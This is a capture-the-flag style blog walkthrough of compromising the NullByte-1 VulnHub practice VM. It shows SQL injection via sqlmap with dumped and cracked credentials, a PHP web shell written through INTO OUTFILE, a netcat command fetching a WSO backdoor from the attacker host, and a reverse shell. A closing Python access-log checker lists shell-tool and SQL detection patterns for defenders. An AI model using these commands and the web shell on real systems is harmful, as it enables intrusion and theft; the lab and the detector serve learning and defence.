[Pentest Series] NullByte-1 Part-1
Hi everyone
This time I'm still using a VM from vulnhub, namely NullByte. Download it here: https://www.vulnhub.com/entry/nullbyte-1,126/
If you ask me, this challenge really isn't all that hard. It just needs a lot of brute forcing, so most of the time is spent there.
[!] VM Level: Medium
Set up the network and rock
I'll assume you already understand how to set up the network. Run nmap and you get a port list like this
Nmap scan report for 192.168.100.5
Host is up (0.00025s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
777/tcp open multiling-http
MAC Address: 08:00:27:86:83:73 (Oracle VirtualBox virtual NIC)
At this stage, you can do deep scanning with -p- (meaning a port scan of 1–65535) and/or -A -sV to look for vulnerabilities in the relevant services
I just went straight to opening its http page
Directory scanning against the web server
As usual, using dirb with the standard common_web.txt. All my wordlists come from Kali Linux
---- Scanning URL: http://192.168.100.5/ ----
+ http://192.168.100.5/index.html (CODE:200|SIZE:196)
==> DIRECTORY: http://192.168.100.5/javascript/
==> DIRECTORY: http://192.168.100.5/phpmyadmin/
+ http://192.168.100.5/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.100.5/uploads/
Oh, it turns out there's a phpmyadmin. But since we don't have a username/password for it, let's skip it for now
Security by Obscurity
I had tried scanning every way I could and nothing came of it. Here:
$ exiftool main.gif
ExifTool Version Number : 10.10
File Name : main.gif
Directory : .
File Size : 16 kB
File Modification Date/Time : 2017:02:14 21:44:22+07:00
File Access Date/Time : 2017:02:14 21:44:24+07:00
File Inode Change Date/Time : 2017:02:14 21:44:22+07:00
File Permissions : rw-rw-r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071
On a whim I looked at its exif data and there was a strange comment. Hmm, could it be a web directory? After I investigated, a strange form like this appeared
And its source looks like this
<center><font color='red'>invalid key</font></center><br>
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>
When I idly went looking for other files that might be clues
---- Scanning URL: http://192.168.100.5/kzMb5nVYJw/ ----
+ http://192.168.100.5/kzMb5nVYJw/index.php (CODE:200|SIZE:187)
Okay, like it or not, it's time to brute force. Open Burp and prepare a password-guessing payload (look for rockyou). We'll brute force this page with Burp Intruder
After a long wait...
There's one key payload whose result differs from the rest. That may be what happens on a successful login, so let's give it a try
If you enter a query, a request like this appears:
http://192.168.100.5/kzMb5nVYJw/420search.php?usrtosearch=a
Let's scan it with Burp, hopefully there's a bug here
Exploiting the Bug
Now use SQLMap to exploit it
sqlmap.py -u "http://192.168.100.5/kzMb5nVYJw/420search.php?usrtosearch=a" -p usrtosearch --dbs --is-dba --users --passwords
[22:22:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[22:22:42] [INFO] testing if current user is DBA
[22:22:42] [INFO] fetching current user
current user is DBA: True
[22:22:42] [INFO] fetching database users
database management system users [6]:
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'nullbyte'
[22:22:42] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[22:22:44] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/home/kucing/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[22:22:45] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[22:22:45] [INFO] starting dictionary-based cracking (mysql_passwd)
[22:22:45] [INFO] starting 4 processes
[22:22:53] [INFO] cracked password 'sunnyvale' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC
[*] phpmyadmin [1]:
password hash: *18DC78FB0C441444482C7D1132C7A23D705DAFA7
clear-text password: sunnyvale
[*] root [1]:
password hash: *18DC78FB0C441444482C7D1132C7A23D705DAFA7
clear-text password: sunnyvale
[22:22:54] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
[22:22:54] [INFO] fetched data logged to text files under '/home/kucing/.sqlmap/output/192.168.100.5'
[*] shutting down at 22:22:54
Now log in using root:sunnyvale
Then run an SQL query to open /etc/passwd
select CAST(load_file('/etc/passwd') AS CHAR(100000000) CHARACTER SET utf8)
RESULT
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
saned:x:110:119::/var/lib/saned:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash
Inspecting the web directory
Now let's try brute forcing the apache configuration file. See my previous writeup on the likely configuration locations
select CAST(load_file('/etc/apache2/sites-enabled/000-default.conf') AS CHAR(10000000) CHARACTER SET utf8)
RESULT
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
If you look above, there was an “uploads” folder.
So why not give it a try? :3
select CAST(load_file('/var/www/html/uploads/index.html') AS CHAR(10000000) CHARACTER SET utf8)
RESULT
<html>
<head><title>Uploads dir</title></head>
<body>
<p>Directory listing not allowed here.</p>
</body>
</html>
Writing a web shell into the directory
Now it's time to try writing a file into that uploads directory, with an SQL command like this
SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/uploads/shell.php'
MySQL returned an empty result set (i.e. zero rows). (Query took 0.0003 seconds.)
Then try accessing it with curl like this
$ curl -X GET "192.168.100.5/uploads/shell.php?cmd=id%20;%20pwd"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/uploads
Make sure netcat is available to transfer the actual backdoor shell file
$ curl -X GET "192.168.100.5/uploads/shell.php?cmd=which%20nc"
/bin/nc
%20 stands in for a space. If you use a literal space it won't work. In a browser it happens automatically, since replacing spaces with %20 is a basic feature there
Uploading the WSO backdoor file
Use netcat to transfer the file
$ nc -lvp 8080 < wso2.5.1.php
Listening on [0.0.0.0] (family 0, port 8080)
And the URL you access will look like this
http://192.168.100.5/uploads/shell.php?cmd=nc%20192.168.100.3%208080%20%3E%20wso.php
And this is the web backdoor I meant
Taking a www-data shell
If you've read the previous pentest series articles, you should be able to do this already, so I don't need to explain it again xD
$ nc -lvp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from [192.168.100.5] port 31337 [tcp/*] accepted (family 2, sport 37232)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash');"
www-data@NullByte:/var/www/html/uploads$ ppwwdd/var/www/html/uploads
www-data@NullByte:/var/www/html/uploads$ llssfile.txt index.html shell.php wso.php
www-data@NullByte:/var/www/html/uploads$ iidduid=33(www-data) gid=33(www-data) groups=33(www-data)
Yes, the shell is rather ugly
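Every step of this chain, from the sqlmap probing of usrtosearch on 420search.php to the id/which/nc requests sent to shell.php, goes through Apache, so the first artifact a defender has is the access log. The checker below is an added example written for this page, not code from the original writeup: it decodes each request's query string and flags SQL-like values, command-like values, and PHP executed under /uploads/. The log lines are constructed to mirror the requests shown above, and the indicator lists are assumptions to tune per environment.

```python
import re
from urllib.parse import unquote_plus, urlsplit
# Apache combined log format; only the fields this check needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Assumed indicator lists, based on what this walkthrough actually sent; extend per environment.
SHELL_TOKENS = re.compile(r'(^|[\s;|&])(nc|id|pwd|which|wget|curl|bash|sh|python|perl)(\s|$)')
METACHARS = re.compile(r'[;|&><`$]')
SQL_TOKENS = re.compile(r"'\s*(and|or|union|select)\b|\b(load_file|into\s+outfile)\b", re.I)

# Constructed sample (not a real capture): the walkthrough's requests plus benign ones.
SAMPLE_LOG = [
    '192.168.100.3 - - [14/Feb/2017:22:20:00 +0700] "GET /kzMb5nVYJw/420search.php?usrtosearch=a HTTP/1.1" 200 187 "-" "Mozilla/5.0"',
    '192.168.100.3 - - [14/Feb/2017:22:22:40 +0700] "GET /kzMb5nVYJw/420search.php?usrtosearch=a%27%20AND%201%3D1--%20 HTTP/1.1" 200 187 "-" "Mozilla/5.0"',
    '192.168.100.3 - - [14/Feb/2017:22:30:01 +0700] "GET /uploads/shell.php?cmd=id%20;%20pwd HTTP/1.1" 200 112 "-" "curl/7.52.1"',
    '192.168.100.3 - - [14/Feb/2017:22:30:05 +0700] "GET /uploads/shell.php?cmd=which%20nc HTTP/1.1" 200 8 "-" "curl/7.52.1"',
    '192.168.100.3 - - [14/Feb/2017:22:31:10 +0700] "GET /uploads/shell.php?cmd=nc%20192.168.100.3%208080%20%3E%20wso.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.100.3 - - [14/Feb/2017:22:10:00 +0700] "GET /index.html HTTP/1.1" 200 196 "-" "Mozilla/5.0"',
]

def parse_query(query):
    """Split on '&' and percent-decode by hand, so a literal ';' inside a value
    (as in 'id%20;%20pwd') is never treated as a pair separator."""
    pairs = []
    for chunk in query.split('&'):
        if chunk:
            name, _, value = chunk.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None for a benign one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    reasons = []
    # 1. A PHP script executed from a directory that should only hold uploaded files.
    if parts.path.startswith('/uploads/') and parts.path.endswith('.php'):
        reasons.append('php executed under /uploads/')
    for name, value in parse_query(parts.query):
        # 2. A parameter named cmd, or a value that decodes to something shell-like.
        if name == 'cmd' or METACHARS.search(value) or SHELL_TOKENS.search(value):
            reasons.append(f'command-like parameter {name}={value!r}')
        # 3. A value carrying SQL syntax (injection probing, or file read/write via SQL).
        elif SQL_TOKENS.search(value):
            reasons.append(f'sql-like parameter {name}={value!r}')
    return {'ip': m.group('ip'), 'time': m.group('ts'), 'path': parts.path, 'reasons': reasons} if reasons else None

def find_attack_hits(lines):
    return [hit for hit in map(inspect_line, lines) if hit]
```

Run against the constructed sample, the plain usrtosearch=a request and index.html are left alone while the injected probe and the three shell.php requests are reported with their decoded payloads.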
Epilogue
In short, this VM seems fairly easy. But it's interesting enough to write about, so stay tuned for the next article :)
Habibie Faried
habibiefaried@gmail.com
@habibiefaried
CISSP & OSC* Wanna Be